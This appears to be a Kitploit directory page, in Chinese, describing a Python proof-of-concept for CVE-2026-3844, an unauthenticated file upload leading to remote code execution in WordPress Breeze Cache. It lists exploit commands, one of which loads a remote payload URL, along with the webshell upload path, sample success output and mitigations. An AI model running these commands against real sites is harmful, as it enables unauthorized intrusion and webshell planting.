Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-3844 — Python 概念验证,针对 CVE-2026-3844,即 WordPress Breeze Cache 插件中的未认证任意文件上传漏洞,可实现远程代码执行。包含检测、利用及 webshell 验证。 | Kitploit
工具/GitHubGitHub/sahmsec/cve-2026-3844
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试Payload 开发
GitHubsahmsec/cve-2026-3844

CVE-2026-3844

Python 概念验证,针对 CVE-2026-3844,即 WordPress Breeze Cache 插件中的未认证任意文件上传漏洞,可实现远程代码执行。包含检测、利用及 webshell 验证。

查看仓库
3个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-3844 — WordPress Breeze Cache 未认证文件上传

概述

本仓库包含一个 Python 概念验证(PoC)脚本,用于演示影响 WordPress Breeze Cache 插件 <= 2.4.4 的未认证任意文件上传漏洞。

⚠️ 本项目仅严格用于授权安全测试、教育研究和防御性验证目的。


漏洞信息

  • CVE ID: CVE-2026-3844
  • 受影响插件: Breeze Cache for WordPress
  • 受影响版本: <= 2.4.4
  • 问题类型: 未认证任意文件上传
  • 影响: 潜在的远程代码执行(RCE)
  • 攻击向量: 远程 / 未认证

该漏洞滥用 Breeze Cache 的 gravatar 缓存功能,将攻击者控制的文件存储到 WordPress 缓存目录中。


功能特性

  • 漏洞检测模式
  • 自动化利用流程
  • Webshell 验证支持
  • 彩色终端输出
  • 远程载荷加载
  • 上传验证检查
  • 可选输出日志记录

环境要求

  • Python 3.8+
  • pycurl
  • termcolor

安装依赖:

root@kitploit:~
pip install pycurl termcolor

文件

文件描述
CVE-2026-3844.py主 PoC 利用脚本
CVE-2026-3844.yamlYAML 模板/配置

使用方法

检查目标是否疑似存在漏洞

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com --check-only

运行利用

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com

自定义载荷

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php

保存结果

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com -o results.txt

工作原理

该脚本执行以下步骤:

  1. 检测已安装的 Breeze Cache 版本
  2. 检查插件版本是否存在漏洞
  3. 提交精心构造的 WordPress 评论请求
  4. 滥用 Breeze 缓存的 gravatar 处理机制
  5. 等待缓存生成
  6. 验证上传的文件是否可访问
  7. 测试载荷的响应性

漏洞路径

上传的载荷可能从以下路径被访问:

root@kitploit:~
/wp-content/cache/breeze-extra/gravatars/

注意事项

成功利用可能取决于以下 Breeze 设置是否已启用:

root@kitploit:~
Host Files Locally - Gravatars

如果该功能被禁用,利用尝试可能会失败。


示例输出

root@kitploit:~
[+] Target VULNERABLE (Breeze v2.4.4)
[+] Comment posted successfully
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!

免责声明

本仓库提供用于:

  • 安全研究
  • 教育目的
  • 授权渗透测试
  • 防御性安全评估

请勿将本项目用于您不拥有或未经明确许可进行测试的系统。

作者对因使用本项目造成的滥用或损害不承担任何责任。


缓解建议

网站管理员应:

  • 将 Breeze Cache 更新到最新的已修补版本
  • 禁用不必要的文件缓存功能
  • 限制危险文件的上传
  • 禁止在缓存目录内执行 PHP
  • 监控 /wp-content/cache/ 目录中的可疑文件
  • 部署 Web 应用防火墙(WAF)
  • 强制执行严格的服务端验证

教育目的声明

本概念验证旨在帮助:

  • 安全研究人员
  • 渗透测试人员
  • 蓝队
  • WordPress 管理员
  • 开发人员

了解与不安全的缓存机制和任意文件上传相关的安全风险。


参考资料

  • CVE 数据库
  • WordPress 安全公告
  • OWASP 文件上传安全指南
  • Breeze Cache 插件文档

作者

安全研究 / 教育项目

下载工具